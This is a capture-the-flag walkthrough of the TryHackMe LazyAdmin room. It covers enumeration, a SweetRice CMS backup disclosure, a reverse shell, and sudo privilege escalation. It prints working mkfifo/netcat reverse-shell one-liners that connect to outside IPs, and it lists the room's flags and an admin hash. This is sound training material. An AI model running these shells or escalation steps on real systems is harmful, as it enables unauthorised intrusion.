Share
## https://sploitus.com/exploit?id=51336335-B6AC-5737-B72D-2B81B5504985
# LazyAdmin-Writeup
Beginner-friendly TryHackMe LazyAdmin writeup covering enumeration, web exploitation, credential discovery, and privilege escalation.
# TryHackMe - LazyAdmin Writeup

## Room Information

| Category       | Details                                                                                   |
| -------------- | ----------------------------------------------------------------------------------------- |
| Platform       | TryHackMe                                                                                 |
| Room Name      | LazyAdmin                                                                                 |
| Difficulty     | Easy                                                                                      |
| Skills Learned | Enumeration, Web Exploitation, Credential Discovery, Reverse Shells, Privilege Escalation |

---

# Introduction

In this writeup, I solved the **LazyAdmin** room on TryHackMe.

The objective of this room was to:

* Perform reconnaissance
* Enumerate services
* Discover vulnerabilities
* Gain initial access
* Escalate privileges to root

This room demonstrates how exposed backups, insecure CMS configurations, and weak privilege separation can lead to full system compromise.

---

# Reconnaissance

## Verifying Connectivity

Before starting enumeration, I verified that the target machine was reachable.

```bash
ping 10.48.149.136
```

The target responded successfully.

### Screenshot

![Ping Test](screenshots/ping.png)

---

# Nmap Enumeration

## Aggressive Scan

I performed an aggressive Nmap scan to identify open ports, running services, versions, and operating system details.

```bash
nmap -A -v -T4 10.48.149.136
```

## Scan Explanation

| Flag  | Purpose                                                              |
| ----- | -------------------------------------------------------------------- |
| `-A`  | Enables OS detection, service detection, NSE scripts, and traceroute |
| `-v`  | Verbose output                                                       |
| `-T4` | Faster scan timing                                                   |

---

## Scan Results

| Port | Service | Version              |
| ---- | ------- | -------------------- |
| 22   | SSH     | OpenSSH 7.2p2 Ubuntu |
| 80   | HTTP    | Apache 2.4.18 Ubuntu |

### Key Findings

* Ubuntu Linux target
* Apache web server
* SSH service enabled
* Potential hidden web application

### Screenshot

![Nmap Scan](screenshots/nmap.png)

---

# Web Enumeration

## Accessing the Website

Navigating to the target IP displayed the default Apache page.

### Observation

The default page indicated:

* Apache was correctly configured
* No direct application was visible
* Hidden directories likely existed

### Screenshot

![Apache Default Page](screenshots/apache-default-page.png)

---

# Directory Enumeration

## Initial FFUF Scan

I used FFUF to brute-force hidden directories.

```bash
ffuf -u http://10.48.149.136/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```

---

## Results

A hidden directory named `content` was discovered.

### Screenshot

![FFUF Enumeration](screenshots/ffuf.png)

---

# Discovering SweetRice CMS

Navigating to:

```text
http://10.48.149.136/content/
```

revealed the target was running **SweetRice CMS**.

### Key Findings

* SweetRice CMS identified
* Site under construction
* Administrative references visible
* Potentially vulnerable CMS version

### Screenshot

![SweetRice CMS](screenshots/content-page.png)

---

# Vulnerability Research

## Searching for Public Exploits

I searched for publicly available exploits related to SweetRice CMS.

```bash
searchsploit SweetRice
```

### Interesting Result

```text
SweetRice 1.5.1 - Backup Disclosure
```

This vulnerability suggested that backup files could be publicly accessible.

### Screenshot

![Searchsploit Results](screenshots/searchsploit.png)

---

# Additional Enumeration

## Enumerating `/content`

I performed another FFUF scan against the `/content` directory.

```bash
ffuf -u http://10.48.149.136/content/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```

---

## Interesting Directories

| Directory    | Description                |
| ------------ | -------------------------- |
| `inc`        | Included application files |
| `as`         | Admin panel                |
| `attachment` | Uploaded files             |
| `_themes`    | Themes                     |
| `js`         | JavaScript resources       |
| `images`     | Image assets               |

### Screenshot

![Additional FFUF Enumeration](screenshots/additional-ffuf.png)

---

# Exploit Analysis

## Reviewing Exploit-DB

The Exploit-DB advisory explained that SweetRice 1.5.1 exposed backup files publicly.

### Vulnerable Path

```text
/content/inc/mysql_backup/
```

### Screenshot

![ExploitDB Backup Disclosure](screenshots/exploitdb-backup-disclosure.png)

---

# Exploiting Backup Disclosure

## Accessing the Backup Directory

Navigating to the vulnerable directory revealed a downloadable SQL backup file.

```text
/content/inc/mysql_backup/
```

### Exposed Backup File

```text
mysql_bakup_20191129023059-1.5.1.sql
```

### Screenshot

![MySQL Backup Disclosure](screenshots/mysql-backup-discovery.png)

---

# Inspecting the SQL Backup

## Reviewing Database Contents

The SQL dump was inspected locally.

```bash
cat mysql_bakup_20191129023059-1.5.1.sql
```

---

## Extracting Credentials

While reviewing the SQL dump, administrator credentials were discovered.

### Credentials

```text
Username: manager
Hash: 42f749ade7f9e195bf475f37a44cafcb
```

The administrator username and MD5 password hash were successfully identified.

### Screenshot

![Inspecting SQL Backup](screenshots/mysql-backup-analysis.png)

---

# Administrative Access

## Accessing the Admin Panel

Using the recovered credentials, I authenticated to the SweetRice administrative dashboard.

### Admin URL

```text
http://10.48.149.136/content/as/
```

Administrative access was successfully achieved.

### Screenshot

![SweetRice Admin Dashboard](screenshots/admin-dashboard.png)

---

# Remote Code Execution

## Preparing the Netcat Listener

Before triggering the reverse shell payload, I started a Netcat listener.

```bash
nc -lvnp 5555
```

---

## Reverse Shell Connection

After uploading and executing the PHP reverse shell payload through the SweetRice CMS, the target connected back successfully.

### Reverse Shell Information

```text
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

The shell was obtained as the `www-data` user.

### Screenshot

![Reverse Shell Access](screenshots/reverse-shell.png)

---

# User Enumeration

## Exploring the Filesystem

After gaining shell access, I enumerated the filesystem.

```bash
cd /home
ls
```

The user `itguy` was discovered.

### Listing User Files

```bash
cd itguy
ls
```

Interesting files:

* `backup.pl`
* `mysql_login.txt`
* `user.txt`

---

# Capturing the User Flag

## Reading the User Flag

```bash
cat user.txt
```

### User Flag

```text
THM{63e5bce9271952aad1113b6f1ac28a07}
```

### Screenshot

![User Flag](screenshots/user-flag.png)

---

# Privilege Escalation

## Checking Sudo Permissions

I checked the sudo permissions available to the `www-data` user.

```bash
sudo -l
```

### Sudo Output

```text
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```

This indicated that the Perl script could be executed as root without a password.

### Screenshot

![Sudo Privilege Escalation](screenshots/sudo-priv-esc.png)

---

# Inspecting the Vulnerable Perl Script

## Reviewing `backup.pl`

```bash
cat /home/itguy/backup.pl
```

### Script Contents

```perl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
```

The script executed `/etc/copy.sh` with elevated privileges.

---

# Inspecting `copy.sh`

## Reviewing the Payload

```bash
cd /etc
cat copy.sh
```

### Existing Payload

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
```

The reverse shell payload needed to be modified to connect back to my attacking machine.

---

# Modifying the Reverse Shell Payload

Because the reverse shell lacked a proper TTY, editors such as `nano` failed.

Instead, I overwrote the file using `echo`.

```bash
echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.204.24 6666 > /tmp/f' > /etc/copy.sh
```

---

# Starting the Root Listener

On my Kali machine, I started another Netcat listener.

```bash
nc -lvnp 6666
```

---

# Executing the Perl Script

I executed the vulnerable Perl script using sudo.

```bash
sudo /usr/bin/perl /home/itguy/backup.pl
```

This triggered the reverse shell payload as root.

---

# Root Shell Obtained

The target connected back successfully.

### Verifying Root Access

```bash
whoami
```

### Output

```text
root
```

---

# Capturing the Root Flag

## Navigating to Root Directory

```bash
cd /root
ls
```

The `root.txt` file was discovered.

---

## Reading the Root Flag

```bash
cat root.txt
```

### Root Flag

```text
THM{6637f41d0177b6f37cb20d775124699f}
```

### Screenshot

![Root Flag](screenshots/root-flag.png)

---

# Flags Captured

| Flag      | Value                                   |
| --------- | --------------------------------------- |
| User Flag | `THM{63e5bce9271952aad1113b6f1ac28a07}` |
| Root Flag | `THM{6637f41d0177b6f37cb20d775124699f}` |

---

# Conclusion

The LazyAdmin room demonstrated several critical real-world security issues:

* Publicly exposed backup files
* Weak password storage mechanisms
* Vulnerable CMS deployment
* Unsafe sudo configurations
* Insecure script execution

By chaining these vulnerabilities together, full system compromise was achieved from initial web enumeration to root access.

---

# Tools Used

* Nmap
* FFUF
* Searchsploit
* Netcat
* Kali Linux
* Exploit-DB
* Perl

---

# Disclaimer

This writeup was created strictly for educational purposes on the TryHackMe platform.

Do not attempt these techniques on systems without explicit authorization.

---